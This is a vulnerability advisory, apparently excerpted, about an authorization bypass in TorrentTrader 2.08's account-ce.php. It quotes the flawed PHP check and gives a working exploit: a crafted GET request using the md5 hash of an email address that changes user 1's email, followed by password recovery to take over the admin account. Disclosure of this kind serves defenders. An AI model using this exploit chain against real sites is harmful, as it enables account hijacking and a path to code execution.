################################################## #############################
1. Unauthorized Email Change in "
account-ce.php"
################################################## #############################
Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
-----------------[ source code start ]---------------------------------
PHP Code:
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
-----------------[ source code end ]-----------------------------------
Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
Target user ID is 1. We issue GET request:
http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com
Quick look to the database confirms, that email address of user with ID 1 has been changed indeed.
Next logical move for attacker is password recovery request:
http://localhost/torrenttrader208/account-recover.php
After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution.
################################################## #############################